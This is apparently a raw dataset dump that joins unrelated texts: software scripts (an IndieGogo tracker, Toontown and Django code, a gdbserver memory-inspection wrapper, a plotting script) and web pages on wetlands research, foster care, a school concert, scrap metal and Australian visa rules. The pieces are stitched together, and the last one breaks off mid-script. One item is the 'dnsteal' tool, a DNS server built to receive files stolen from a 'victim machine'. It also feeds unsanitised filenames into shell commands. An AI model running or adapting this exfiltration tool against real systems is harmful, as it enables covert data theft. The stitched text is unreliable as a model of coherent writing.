text
stringlengths
29
850k
#!/usr/bin/python
# Ubuntu Edge crowdfunding tracker: a GTK AppIndicator that scrapes the
# IndieGogo campaign page every five minutes and shows the running total
# (plus a linear projection of the final total) in the panel.
from gi.repository import Gtk, GObject
from gi.repository import AppIndicator3 as appindicator
import urllib, re, os, time, datetime


def openit(*args):
    """Menu callback: open the campaign page in the default browser."""
    os.system("xdg-open http://www.indiegogo.com/projects/ubuntu-edge")


# Campaign start and end times; both UTC.
STARTTIME = datetime.datetime(2013, 7, 22, 15, 0, 0)
ENDTIME = datetime.datetime(2013, 8, 22, 7, 0, 0)


def update(*args):
    """Fetch the campaign page and refresh the indicator label plus the
    'Last updated' and 'Projected' menu items.

    Always returns True so GObject.timeout_add_seconds keeps rescheduling.
    """
    # Screen scraping of glory: the dollar amount lives on the single page
    # line containing all three of these markers.
    fp = urllib.urlopen('http://www.indiegogo.com/projects/ubuntu-edge')
    try:
        data = fp.read()
    finally:
        # Close the connection even if read() fails; the handle was
        # previously leaked on every 5-minute tick.
        fp.close()
    mtch = [x for x in data.split('\n')
            if '$2,' in x and 'amount' in x and 'medium' in x]
    if len(mtch) != 1:
        # Page layout changed (or matched more than once): show placeholder.
        ind.set_label("?????", "$32.00m")
        return True
    val = re.search("\$([0-9,]+)<", mtch[0])
    val = val.groups()[0]
    val = val.replace(",", "")
    val = int(val)
    mval = val / 1000000.0
    ind.set_label("$%0.2fm" % mval, "$32.0m")
    lst.get_child().set_text("Last updated: %s" % time.strftime("%H:%M"))
    now = datetime.datetime.utcnow()
    done = now - STARTTIME
    togo = ENDTIME - now
    done_seconds = (done.days * 24 * 60 * 60) + done.seconds
    togo_seconds = (togo.days * 24 * 60 * 60) + togo.seconds
    if done_seconds <= 0:
        # Campaign has not started yet; the projection below would divide
        # by zero (or by a negative elapsed time).
        return True
    # Linear projection: assume money keeps arriving at the average rate
    # observed so far for the remainder of the campaign.
    ratio = float(togo_seconds) / done_seconds
    projected = val + (ratio * val)
    mprojected = projected / 1000000.0
    prj.get_child().set_text("Projected: $%0.2fm" % mprojected)
    return True


if __name__ == "__main__":
    ind = appindicator.Indicator.new(
        "ubuntu-edge-indicator", "",
        appindicator.IndicatorCategory.APPLICATION_STATUS)
    ind.set_status(appindicator.IndicatorStatus.ACTIVE)
    ind.set_label("$$$$$", "$32.0m")
    menu = Gtk.Menu()
    opn = Gtk.MenuItem("Open IndieGogo")
    menu.append(opn)
    lst = Gtk.MenuItem("Last updated: ?????")
    menu.append(lst)
    prj = Gtk.MenuItem("Projected: ?????")
    menu.append(prj)
    menu.show_all()
    opn.connect("activate", openit)
    ind.set_menu(menu)
    # Refresh every 5 minutes, plus once immediately at startup.
    GObject.timeout_add_seconds(300, update)
    update()
    Gtk.main()
1) how do the structure and function of wetlands and streams respond to local land-use and global climate change? 2) can current and emerging management tools reverse or restore the functioning of wetlands and streams? If you are interested in joining us as a graduate student please look through the website and then send Marcelo an email with your CV and research interests. We welcome students, postdocs, and visiting scholars regardless of race, religion, gender identification, sexual orientation, age, or disability status. We believe that the more diverse the lab is, the better we will be at advancing our understanding of our changing world. January 2019- Check out our new papers in Biogeochemistry and Ecosystems regarding greenhouse gas emissions from wetlands in response to drought and flooding. -August 2018- We had a successful summer with two REUs in North Carolina and two REUs in Costa Rica. -January 2018- Steve Anderson joined the lab to pursue his MS. -August 2017- Melinda Martinez and Nick Marzolf joined the lab as PhD students. Gillian Gundersen successfully defended her MS thesis! July 2017- I need to be better at updating lab news! We have been busy settling in at NCSU. Updates on the lab instruments coming soon. We presented at SFS in Raleigh. Marcelo traveled to Costa Rica to start the new round of the LTREB project. We have been swamped with field work with our NC wetlands work. Two new students will join the lab this summer (more info to come!). -August 2016-It has been a busy summer. We had three REUs and an RET working in the lab. And at the end of the summer we moved to the Department of Forestry and Environmental Resources at NCSU! -April 2016- Congrats to Tori for successfully defending her MS thesis. She answered the question in everybody's mind: what the floc? -February 2016- we will be moving to NCSU Department of Forestry and Environmental Resources in the Fall. 
-November- Kudos to Tori for representing the lab in ECU's 3 Minute Thesis competition and a symposium at the Duke Marine Lab! -September- Beginning of new semester and Ashley's paper is out in Ecology Letters! -August 15- Luise Armstrong, Matt Stillwagon, and Gillian Gunderson join the lab! Harriot College of Arts and Sciences! -23 April 15- Our Global Change Biology paper was awarded the Mercer award by ESA! -15 April 15- Marcelo receives NSF CAREER award!
from direct.distributed.DistributedObject import DistributedObject
from toontown.building.HouseInterior import HouseInterior
from toontown.toon.DistributedNPCToonBase import DistributedNPCToonBase
from ZoneBuilding import ZoneBuilding


class DistributedToonHouseInterior(DistributedObject, HouseInterior, ZoneBuilding):
    """Client-side distributed object for a toon house interior.

    Combines the networked DistributedObject lifecycle with the
    HouseInterior model and ZoneBuilding behaviour, and positions NPC
    toons at server-supplied origin placements.
    """

    def __init__(self, cr):
        DistributedObject.__init__(self, cr)
        HouseInterior.__init__(self)
        # Server-populated state. Each posIndices entry is splatted into
        # setPosHpr, so presumably (x, y, z, h, p, r) -- TODO confirm.
        self.ownerId = -1
        self.director = None
        self.posIndices = []

    def getBlock(self):
        """Return the building block identifier for this interior."""
        return self.block

    def announceGenerate(self):
        DistributedObject.announceGenerate(self)
        self.setup()
        # Re-apply placements that may have arrived before setup() ran.
        self.setPosIndices(self.posIndices)

    def disable(self):
        HouseInterior.disable(self)
        DistributedObject.disable(self)

    def getInteriorObject(self):
        """This object serves as its own interior handle."""
        return self

    def setPosIndices(self, posIndices):
        """Store NPC placements and apply them to the loaded interior."""
        self.posIndices = posIndices
        if not self.interior:
            # Interior model not loaded yet; announceGenerate retries later.
            return
        for index, placement in enumerate(self.posIndices):
            node = self.interior.find('**/npc_origin_%s' % index)
            if node.isEmpty():
                node = self.interior.attachNewNode('npc_origin_%s' % index)
            node.setPosHpr(*placement)
        for npcToon in self.cr.doFindAllInstances(DistributedNPCToonBase):
            npcToon.initToonState()
Profile Response: Matt Cleveland, Little Rock AR | How Will We Live Tomorrow? Arkansas Governor Asa Hutchinson has described a crisis in the state’s foster care system. There are twice as many children in need of foster care as available placements. The governor is trying to increase the number of foster homes, particularly among faith-based communities. One established foster care setting is the Sherriff’s Youth Ranch, a compound of four eight-children houses that has the capability to double capacity. Matt Cleveland, Development Director, described the situation and some of the hurdles the foster system faces. “Our history is of sheriff’s finding children with no where to go.” Forty years ago, they banded together, purchased a ranch outside Batesville, and began Youth Ranch. The organization is sponsored by all 75 county sheriff departments in the state. Youth Ranch grew to three campuses, but the economics of operating multiple sites proved difficult, so the group is focusing on its original ranch and hopes to expand operations there. Certain aspects of Youth Ranch are more generous than traditional foster care. Foster children age out of the system at 4 p.m. on their eighteenth birthday. At Youth Ranch a boy, or less often a girl, “can stay until they transition out as long as they follow the rules and work towards a goal, even up to age 21.” Youth Ranch residents also have educational goals and opportunity to work outdoors: the setting includes a 600 acres working cattle ranch. Creating a nurturing and stimulating environment for the children costs money. It takes $30,000 a year to support a child at Youth Ranch. “The state’s foster care allowance covers only 10% of our budget.” That’s a lot of money compared with raising a child in a family household, but only a fraction of what adults gone astray can cost society. “I figure we’ve got to figure out ways to live together. We have more commonalities than we find on social media. More binds us than divides. 
We have to find more ways to open up to each other. It doesn’t have to be, but it might be, opening your home. Things aren’t going to get better until we do that. This entry was posted in Responses and tagged Arkansas Sherriff's Youth Ranch, Matt Cleveland. Bookmark the permalink.
#!/usr/bin/env python ##################### import socket import sys import binascii import time import random import hashlib import zlib import os class DNSQuery: def __init__(self, data): self.data = data self.data_text = '' tipo = (ord(data[2]) >> 3) & 15 # Opcode bits if tipo == 0: # Standard query ini=12 lon=ord(data[ini]) while lon != 0: self.data_text += data[ini+1:ini+lon+1]+'.' ini += lon+1 lon=ord(data[ini]) def request(self, ip): packet='' if self.data_text: packet+=self.data[:2] + "\x81\x80" packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts packet+=self.data[12:] # Original Domain Name Question packet+='\xc0\x0c' # Pointer to domain name packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP return packet def banner(): print "\033[1;31m", print """ ___ _ _ ___ _ _ | \| \| / __| |_ ___ __ _| | | |) | .` \__ \ _/ -_) _` | | |___/|_|\_|___/\__\___\__,_|_| -- https://github.com/nemanjan00/dnsteal.git --\033[0m Stealthy file extraction via DNS requests """ if __name__ == '__main__': try: ip = sys.argv[1] ipr = sys.argv[2] ipr = socket.gethostbyname(ipr) except: banner() print "Usage: %s [listen_address] [return_ip]" exit(1) banner() udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp.bind((ip,53)) print '\033[1;32m[+]\033[0m DNS listening on %s:53' % ip print "\033[1;32m[+]\033[0m Now on the victim machine, use the following command:" while 1: try: data, addr = udp.recvfrom(1024) p=DNSQuery(data) udp.sendto(p.request(ipr), addr) print 'Request: %s -> %s' % (p.data_text, ipr) filename = "" data = p.data_text data = data.replace("/", "") data = data.replace("\\", "") data = data.split(".") for index,item in enumerate(data): if(index < len(data) - 3): if(index == 1): filename = item if(index > 1): filename += "." 
+ item os.popen("mkdir -p data") filename = "data/"+filename if(data[0] != "gunzip"): f = open(filename, "a") f.write(binascii.unhexlify(data[0])) f.close() else: os.popen("mv " + filename + " " + filename + ".ori ; cat " + filename + ".ori | gunzip > " + filename) except Exception: pass
Patrons enjoyed a relaxed dinner whilst listening to performances from the Sheldon College Big Band, Stage Band, Jazz Project, Dixieland Band and Eve Vocal Ensemble. The night afforded students from Year 6 to Year 12 the valuable experience of performing in front of a live audience at an external venue. Our debut performers, Stage Band, kicked off the evening with a fantastic performance, followed by The Jazz Project, made up of senior students, who entertained the crowds with their relaxed style of Jazz. Eve Vocal Ensemble followed and, once again, sang like angels to a very appreciative crowd. Dixieland were the next band to take to the stage, giving us a lively and exciting performance under the new direction of Ms Julianne Moore. To round off the evening, our outstanding Big Band performed great big band music, with the help of our jazz vocalists, for over half an hour.
# URLConf for the ``abo`` subscription app: core subscription-management
# views plus any URLs contributed by individual payment backends.
from django.conf.urls import patterns, url, include

from abo.utils import import_backend_modules

# Mount each backend package that ships a ``urls`` module under its short
# name (the last component of its dotted path), e.g. ``^stripe/...``.
backend_specific_urls = []
for backend_name, urls in import_backend_modules('urls').items():
    simple_name = backend_name.split('.')[-1]
    backend_specific_urls.append(url(r'^%s/' % simple_name, include(urls)))

# NOTE(review): imported after the backend scan above; kept in this
# position to preserve the original module's import-time ordering.
from .views import (
    CancelView,
    ChangeCardView,
    ChangePlanView,
    HistoryView,
    SubscribeView,
    SubscriptionSuccessView,
    SubscriptionFailureView
)

# Core subscription URLs first, then the backend-specific ones.
urlpatterns = patterns(
    '',
    url(r"^subscribe/$", SubscribeView.as_view(), name="abo-subscribe"),
    url(r"^subscription/(?P<pk>\d+)/success/$", SubscriptionSuccessView.as_view(), name="abo-success"),
    url(r"^subscription/(?P<pk>\d+)/failure/$", SubscriptionFailureView.as_view(), name="abo-failure"),
    url(r"^change/card/$", ChangeCardView.as_view(), name="abo-change_card"),
    url(r"^change/plan/$", ChangePlanView.as_view(), name="abo-change_plan"),
    url(r"^cancel/$", CancelView.as_view(), name="abo-cancel"),
    url(r"^history/$", HistoryView.as_view(), name="abo-history"),
    *backend_specific_urls
)
Our accessible, tidy and well organised yard is here to make your scrap metal recycling experience as enjoyable and hassle-free as possible. We aim to deliver the highest levels of customer service and adhere to the very best health and safety standards across all aspects of our business. If you have scrap metal to drop off, our respectful and friendly team are here to help you unload, get weighed and get paid. If you have larger amounts of scrap metal that is too big for you to drop off, then we can offer a dedicated pickup service. We always go out of our way to give every customer an enjoyable experience and get the very best recycling deals. For more information or to get paid for your scrap metal please call us on 0800 226 626 or 03 384 4059. Suzanne is an excellent trade rep. With 20 years experience in the scrap metal industry, she is expertly poised to offer practical and reliable advice on any metal recycling service you need. An expert in getting things done, Suzanne knows the market and how to get the very best deals for all her customers. Originally from the United Kingdom, Suzanne is proud to call Christchurch home. She loves her job and loves meeting new people every single day. If you have any scrap metal that needs recycling, Suzanne will get you paid the very best rate, on time. A problem solver and practical man, Brendan is a friendly, reliable and hardworking rep who loves helping his customers get the best deal for their scrap metal. If you have any questions about any scrap metal you need recycling, give Brendan a call and he will do everything he can to help you recycle it.
#!/usr/bin/env python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Asyncio wrapper around ``gdbserver`` speaking the GDB Remote Serial
# Protocol over the child's stdin/stdout: spawn a target under gdbserver,
# set breakpoints, continue/step/interrupt, and read registers; memory is
# read directly through /proc/<pid>/ rather than through the protocol.

import struct
import os
import threading
import re
import functools
import codecs
import psutil
import asyncio
import asyncio.subprocess


def re_findall(q, s):
    """Yield the start offset of every (possibly overlapping) regex match
    of ``q`` in ``s``."""
    idx = 0
    while True:
        match = re.search(q, s[idx:])
        if not match:
            break
        yield idx+match.start()
        # Resume one position past the last match start so overlapping
        # matches are also reported.
        idx += match.start()+1


def string_findall(q, s):
    """Yield the start offset of every (possibly overlapping) occurrence
    of substring ``q`` in ``s``."""
    idx = 0
    while True:
        idx = s.find(q, idx)
        if idx < 0:
            break
        yield idx
        idx = idx+1


class GDBInterrupt(object):
    """Broker message: deliver Ctrl-C (0x03) to the running target."""
    def __init__(self):
        pass


class GDBCommand(object):
    """Broker message: a raw RSP command, optionally expecting a reply.

    A command with no reply queue is a 'continue-like' command (vCont):
    sending it marks the target as running.
    """
    def __init__(self, data, reply_queue = None):
        self.data = data
        self._reply_queue = reply_queue

    def will_continue(self):
        # No reply queue means the caller does not wait: the command
        # resumes the target instead of producing an immediate reply.
        return self._reply_queue == None

    async def reply(self, pkt):
        if self._reply_queue:
            await self._reply_queue.put(pkt)


class GDBError(object):
    """Broker-generated error reply (e.g. command while target running)."""
    def __init__(self, msg):
        self.msg = msg


class GDBReply(object):
    """A decoded packet received from gdbserver."""
    def __init__(self, data):
        self.data = data

    def is_stop_reply(self):
        # 'T...' packets are asynchronous stop notifications (breakpoint
        # hit, signal, single-step finished).
        return self.data.startswith(b'T')


class ExitMsg(object):
    """Broker message: shut the message broker down."""
    def __init__(self):
        pass


def gdb_checksum(cmd):
    """Return the two-hex-digit RSP checksum (byte sum mod 256) of cmd."""
    checksum = functools.reduce(lambda csum, c: (csum+c)%256, cmd, 0)
    return '{:02x}'.format(checksum).encode('ascii')


def gdb_encode(s):
    """Escape RSP metacharacters: '#', '$' and '}' become '}' + (c^0x20)."""
    out = b''
    for c in s:
        if c in b'#$}':
            out += b'}'+bytes([c ^ 0x20])
        else:
            out += bytes([c])
    return out


def gdb_decode(s):
    """Undo RSP encoding: expand '*' run-length sequences and '}' escapes."""
    out = b''
    i = 0
    while i < len(s):
        c = s[i]
        if c == ord('*'):
            # Run-length: repeat the previous output byte (count is the
            # following byte minus 29, per the RSP spec).
            cnt = s[i+1] - 29
            out += bytes([out[-1]]*cnt)
            i += 2
        elif c == ord('}'):
            # Escape: next byte XOR 0x20 is the literal character.
            c = s[i+1]
            c = bytes([c ^ 0x20])
            out += c
            i += 2
        else:
            out += bytes([c])
            i += 1
    return out


def gdb_format_cmd(s):
    """Frame an already-escaped payload as '$<payload>#<checksum>'."""
    return b'$' + s + b'#' + gdb_checksum(s)


def gdb_make_pkt(data):
    """Escape and frame a raw payload into a complete RSP packet."""
    return gdb_format_cmd(gdb_encode(data))


async def message_broker(pkt_queue, reply_queue, stop_reply_queue, gdbserver_stdin):
    """Serialize all traffic to gdbserver and track run/stop state.

    Consumes from pkt_queue:
      * GDBCommand  -- forwarded only while the target is stopped;
                       continue-like commands flip state to running.
      * GDBInterrupt - writes the raw 0x03 interrupt byte while running.
      * GDBReply    -- a stop notification routed in by packet_reader;
                       flips state back to stopped.
      * ExitMsg     -- terminates the broker.
    """
    stopped = True
    while True:
        pkt = await pkt_queue.get()
        if isinstance(pkt, GDBCommand):
            if not stopped:
                # Commands are only legal while the target is stopped.
                await pkt.reply(GDBError('not stopped'))
                continue
            gdbserver_stdin.write(gdb_make_pkt(pkt.data))
            if pkt.will_continue():
                stopped = False
                continue
            # Synchronous command: wait for its reply and hand it back.
            reply = await reply_queue.get()
            await pkt.reply(reply)
        elif isinstance(pkt, GDBInterrupt):
            if stopped:
                continue
            # Raw interrupt byte, not a framed packet.
            gdbserver_stdin.write(b'\x03')
        elif isinstance(pkt, ExitMsg):
            return
        else:
            assert isinstance(pkt, GDBReply)
            assert pkt.is_stop_reply()
            assert not stopped
            stopped = True
            await stop_reply_queue.put(pkt)


async def packet_reader(pkt_queue, reply_queue, gdbserver_stdout):
    """Parse gdbserver's stdout stream into packets.

    Acks ('+') are dropped, stop replies go to pkt_queue (so the broker
    can update run/stop state), all other replies go to reply_queue.
    Raises on framing or checksum errors; returns on EOF.
    """
    while True:
        next_char = await gdbserver_stdout.read(1)
        if not next_char:
            return
        if next_char == b'+':
            # ignore acks
            continue
        if next_char != b'$':
            raise Exception('unexpected character (want $, got {!r})'.format(next_char))
        pkt = b''
        pkt += (await gdbserver_stdout.readuntil(b'#'))[:-1]
        checksum = await gdbserver_stdout.read(2)
        if not checksum == gdb_checksum(pkt):
            raise Exception('wrong checksum {} vs {}, "{}"'.format(checksum, gdb_checksum(pkt), pkt))
        reply = GDBReply(gdb_decode(pkt))
        if reply.is_stop_reply():
            await pkt_queue.put(reply)
        else:
            await reply_queue.put(reply)


class GDBProcess(object):
    """A target process running under gdbserver, driven over RSP."""

    @staticmethod
    async def create(argv, stop_reply_queue, env={}, log_fn=None):
        """Spawn ``gdbserver --once - argv`` and wire up broker/reader tasks.

        Stop notifications (breakpoints, steps, interrupts) are delivered
        to stop_reply_queue. Returns the ready GDBProcess.

        NOTE(review): ``env={}`` is a mutable default argument; safe only
        as long as no caller mutates the passed dict.
        """
        self = GDBProcess()
        self._bp_mutex = threading.Lock()
        # addr -> bool (True if hardware breakpoint).
        self._breakpoints = {}
        self._log_fn = log_fn
        # New session (os.setsid) so the whole group can be killed at once
        # in release().
        self._p = await asyncio.create_subprocess_exec('gdbserver', '--once', '-', *argv, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE, preexec_fn=os.setsid, env=env, close_fds=True, bufsize=0)
        self._pkt_queue = asyncio.Queue()
        reply_queue = asyncio.Queue()
        loop = asyncio.get_event_loop()
        self._msg_broker = loop.create_task(message_broker(self._pkt_queue, reply_queue, stop_reply_queue, self._p.stdin))
        self._pkt_reader = loop.create_task(packet_reader(self._pkt_queue, reply_queue, self._p.stdout))
        # Lazily-opened O_PATH fd for the target's /proc/<pid>/ directory.
        self._proc_dir_fd = None
        await self._start_no_ack()
        return self

    def breakpoints(self):
        """Return the list of currently-set breakpoint addresses."""
        return list(self._breakpoints.keys())

    def _log(self, msg):
        if self._log_fn:
            self._log_fn(msg)

    async def release(self):
        """Cancel the I/O tasks and kill the whole gdbserver process group."""
        self._log('killing gdb process')
        self._msg_broker.cancel()
        self._pkt_reader.cancel()
        os.killpg(os.getpgid(self._p.pid), 9)
        await self._p.wait()
        self._log('killed gdb process')

    def open_proc_file(self, filename, mode='r'):
        """Open a file under the target's /proc/<pid>/ directory.

        The target is gdbserver's single child (found via psutil on first
        use); the directory is pinned with an O_PATH fd so later opens work
        by fd even if the path changes.
        """
        if not self._proc_dir_fd:
            child_processes = psutil.Process(self._p.pid).children()
            assert len(child_processes) == 1
            child_pid = child_processes[0].pid
            self._proc_dir_fd = os.open('/proc/{}/'.format(child_pid), os.O_PATH)
        return open('/proc/self/fd/{}/{}'.format(self._proc_dir_fd, filename), mode)

    def maps(self):
        """Parse /proc/<pid>/maps into (start, size, perms, name) tuples.

        Only private ('p') mappings match the regex; shared mappings would
        raise on the .groups() call -- NOTE(review): confirm intentional.
        """
        mappings = []
        with self.open_proc_file('maps', 'r') as fd:
            for line in fd.read().splitlines():
                start,end,perm,name = re.match('^([0-9a-f]+)-([0-9a-f]+)\s+([rwx-]{3})p\s+[0-9a-f]+\s+[0-9a-f]{2}:[0-9a-f]{2}\s+[0-9a-f]+\s+(.*)$', line).groups()
                start = int(start, 16)
                end = int(end, 16)
                size = end - start
                mappings.append((start, size, perm, name))
        return mappings

    def search(self, q, qtype, max_match_count = 64):
        """Search target memory for ``q``; return [[address, bytes], ...].

        qtype selects interpretation: 'regex' and 'string' search the raw
        bytes; 'char'/'short'/'int'/other pack q as a native-order integer
        of that width (B/H/I/Q) and search for the packed bytes. Unreadable
        or unseekable regions are skipped. Each match returns at least 32
        bytes of context.
        """
        mappings = self.maps()
        matches = []
        with self.open_proc_file('mem', 'rb') as mem_fd:
            for start, size, perm, _ in mappings:
                try:
                    mem_fd.seek(start)
                except ValueError:
                    continue
                except OverflowError:
                    # e.g. [vsyscall] addresses beyond off_t range.
                    self._log('overflow error')
                    continue
                try:
                    data = mem_fd.read(size)
                except IOError:
                    continue
                try:
                    if qtype == 'regex':
                        search_fn = re_findall
                    else:
                        search_fn = string_findall
                        if qtype != 'string':
                            # Numeric query: pack to native-order bytes.
                            if qtype == 'char':
                                format_char = 'B'
                            elif qtype == 'short':
                                format_char = 'H'
                            elif qtype == 'int':
                                format_char = 'I'
                            else:
                                # long
                                format_char = 'Q'
                            q = struct.pack(format_char, int(q, 0))
                    for idx in search_fn(q, data):
                        match = data[idx:idx+max(32, len(q))]
                        matches.append([start+idx, match])
                        if len(matches) > max_match_count:
                            break
                except ValueError:
                    # int(q, 0) failed or pack overflowed; skip region.
                    continue
        return matches

    async def _write_pkt(self, cmd):
        """Send a synchronous RSP command via the broker and await its reply.

        Raises if the broker reports an error (e.g. target not stopped).
        """
        self._log('_write_pkt("{}")'.format(cmd))
        reply_queue = asyncio.Queue(maxsize=1)
        await self._pkt_queue.put(GDBCommand(cmd, reply_queue))
        pkt = await reply_queue.get()
        if isinstance(pkt, GDBError):
            raise Exception(pkt.msg)
        assert isinstance(pkt, GDBReply)
        return pkt.data

    async def _start_no_ack(self):
        """Negotiate QStartNoAckMode, acking that final exchange manually."""
        resp = await self._write_pkt(b'QStartNoAckMode')
        if resp != b'OK':
            raise Exception('NoAck response: "{}"'.format(resp))
        # Last required ack before ack-less mode takes effect.
        self._p.stdin.write(b'+')

    async def set_breakpoint(self, addr):
        """Set a breakpoint at addr (hardware for the first 4, then software).

        NOTE(review): a threading.Lock is held across an await here; fine
        single-threaded, but not safe across event loops/threads.
        """
        with self._bp_mutex:
            if addr in self._breakpoints:
                return
            self._log('setting breakpoint at 0x{:x}'.format(addr))
            hardware_breakpoint = len(self._breakpoints) < 4
            # Z1 = hardware breakpoint, Z0 = software breakpoint.
            command = 'Z1' if hardware_breakpoint else 'Z0'
            resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii'))
            if resp != b'OK':
                raise Exception('Breakpoint error: "{}"'.format(resp))
            self._breakpoints[addr] = hardware_breakpoint

    async def remove_breakpoint(self, addr):
        """Remove the breakpoint previously set at addr (KeyError if none)."""
        with self._bp_mutex:
            hardware_breakpoint = self._breakpoints[addr]
            command = 'z1' if hardware_breakpoint else 'z0'
            resp = await self._write_pkt('{},{:x},1'.format(command, addr).encode('ascii'))
            if resp != b'OK':
                raise Exception('Breakpoint error: "{}"'.format(resp))
            del self._breakpoints[addr]

    def _cont(self, mode):
        # Fire-and-forget: no reply queue marks this as a continue-like
        # command, so the broker flips the target to 'running'.
        self._pkt_queue.put_nowait(GDBCommand(b'vCont;'+mode))

    def cont(self):
        """Resume the target ('vCont;c')."""
        self._cont(b'c')

    def step(self):
        """Single-step the target ('vCont;s')."""
        self._cont(b's')

    def interrupt(self):
        """Interrupt a running target (sends raw 0x03 via the broker)."""
        self._log('interrupting with 0x03')
        self._pkt_queue.put_nowait(GDBInterrupt())

    # x86-64 register order as gdbserver reports them in the 'g' reply.
    _REG_NAMES = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15", "rip", "eflags", "cs", "ss", "ds", "es", "fs", "gs"]

    async def get_reg(self, name):
        """Return one register value by name (fetches the full set)."""
        return (await self.get_regs())[name]

    async def get_regs(self):
        """Fetch all registers ('g' packet) as a {name: int} dict.

        NOTE(review): every slot is unpacked as 64-bit ('Q'), including
        eflags/segment registers -- assumes gdbserver pads them to 8 bytes;
        confirm against the target's register layout.
        """
        resp = await self._write_pkt(b'g')
        data = codecs.decode(resp, 'hex_codec')
        regs = {}
        for i in range(len(GDBProcess._REG_NAMES)):
            regs[GDBProcess._REG_NAMES[i]] = struct.unpack('Q', data[i*8:(i+1)*8])[0]
        return regs

    def read_mem(self, addr, count):
        """Read count bytes at addr via /proc/<pid>/mem.

        On failure, retries byte-at-a-time so a partially-readable range
        still returns the readable prefix; returns b'' when nothing is
        readable.
        """
        data = b''
        with self.open_proc_file('mem', 'rb') as mem_fd:
            try:
                mem_fd.seek(addr)
                data = mem_fd.read(count)
            except:
                try:
                    mem_fd.seek(addr)
                    for i in range(count):
                        data += mem_fd.read(1)
                except:
                    # Best-effort: return whatever was read so far.
                    pass
        return data


async def main():
    """Demo harness: break inside /bin/sleep, step, continue, interrupt."""
    def log(msg):
        print('[*] {}'.format(msg))
    stop_queue = asyncio.Queue()
    import time
    print('creating process')
    p = await GDBProcess.create(['/bin/sleep', '5'], stop_queue, log_fn=log)
    print('process created')
    # Hard-coded address; only valid for a specific libc build with ASLR
    # disabled under gdbserver.
    await p.set_breakpoint(0x7ffff7dda886)
    print('breakpoint at 0x7ffff7dda886')
    p.cont()
    await stop_queue.get()
    for i in range(10):
        p.step()
        await stop_queue.get()
        print(hex((await p.get_regs())['rip']))
    p.cont()
    await asyncio.sleep(0.1)
    p.interrupt()
    await stop_queue.get()
    print(hex((await p.get_regs())['rip']))
    await p.release()


if __name__ == "__main__":
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())
    loop.close()
This article explains how these changes will affect visa applicants. The Migration Legislation Amendment (2017 Measures No. 4) Regulations 2017 F2017L01425 was disallowed on 5 December 2017. Note that the changes may still apply to applications lodged between 18 November and 5 December 2017. The main concern appears to be the changes to the 4020 Public Interest Criterion - it is quite possible the Government will seek to re-introduce the other initiatives in the instrument, and possibly a revised version of the changes to 4020. This article gives a good indication of the Government's intentions going forward. The relevant legislation - the Migration Amendment (Family Violence and Other Measures) Bill 2016 - has not yet passed the Senate and has been referred to a Senate Committee for Consideration. We will update readers when we have further information about this matter. These changes are no longer in effect due to the disallowance of F2017L01425. an application which has been refused in the last 3 years (or 5 years in some cases). In other words, if false or misleading information is provided in a visa application, it could affect future applications for up to 10 years. Previously, it was possible to withdraw a visa application if false or misleading information had been provided and this would not necessarily result in 4020 refusals for future applications. This will no longer work as 4020 will apply for any visa applications made within the last 10 years, whether the application is granted, refused or withdrawn. One of the commonly encountered issues with 4020 is the failure to declare past criminal records when making a visa application. Generally, a declaration about previous offences is included in the visa application form. If this is not correctly completed, it can trigger 4020 issues. This would affect both the current application, and potentially any future applications for the next 10 years. 
Australian Governments have expressed concern about health care costs which have been incurred by temporary visa holders in Australia but not repaid. As a result, a new visa condition 8602 has been introduced which requires applicants for temporary visas not to have an outstanding public health debt. This would apply to medical costs owing to either Australian state, territory or federal governments. If a temporary visa holder incurs a public health debt, this could result in cancellation of their current visa and also make it more difficult to obtain subsequent visas. A definition of "Adequate arrangements for health insurance" has been added to the Migration Regulations. This allows the Minister to specify what kind of health insurance will meet visa requirements. The intention of this change is to reduce the risk of identity fraud, and the example is provided of the Martin Place Siege perpetrator (Man Haron Monis). He used multiple identities when dealing with Australian Government Agencies. Condition 8564 forbids the visa holder from engaging in criminal activities in Australia. Previously it only applied to Bridging E visas. The condition will now apply to a wide range of temporary visas. Condition 8303 has been broadened to prohibit activities which endanger or threaten individuals. Previously, it only applied to violent or disruptive activities affecting the Australian community more broadly. As a result it will be easier for Immigration to cancel temporary visas of people engaging in criminal or other dangerous activities in Australia. The changes to 4020 make it more important than ever to ensure that false or misleading information is not provided when making a visa application. New health conditions apply to temporary visas - these could affect people needing medical treatment in Australia and so ensuring that you have suitable health insurance is very important.
If you would like assistance with a visa issue, please book a consultation with one of our advisors to get detailed advice.
import argparse

import matplotlib.pyplot as plt
import numpy

import mir3.data.feature_track as feature_track


def plot(input_filename, output_filename, scale=None, dim=0, size=(3.45, 2.0)):
    """Plot one dimension of a feature track to an image file.

    Args:
        input_filename: feature-track file to load.
        output_filename: figure file to write (format inferred from the
            extension by matplotlib).
        scale: optional text appended to the y-axis label, in parentheses.
        dim: dimension to plot (used for multidimensional feature tracks).
        size: output figure size as (width, height) in inches.
    """
    s = feature_track.FeatureTrack().load(input_filename)

    # Select the requested dimension; 1-D tracks have no dimension axis.
    if s.data.ndim > 1:
        d = s.data[:, dim]
    else:
        d = s.data

    # The feature name for this dimension labels the y axis.
    ylabel = s.metadata.feature.split()[dim]
    if scale is not None:
        ylabel += ' (%s)' % str(scale)

    # Convert sample indices to seconds using the track's output frame rate
    # (ofs = output frames per second).
    ofs = float(s.metadata.sampling_configuration.ofs)
    x_axis = numpy.arange(len(d)) / ofs

    plt.plot(x_axis, d)
    plt.xlabel('Time (s)')
    plt.ylabel(ylabel)

    fig = plt.gcf()
    fig.set_size_inches(size)
    plt.savefig(output_filename, bbox_inches='tight')


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Plot a spectrogram')
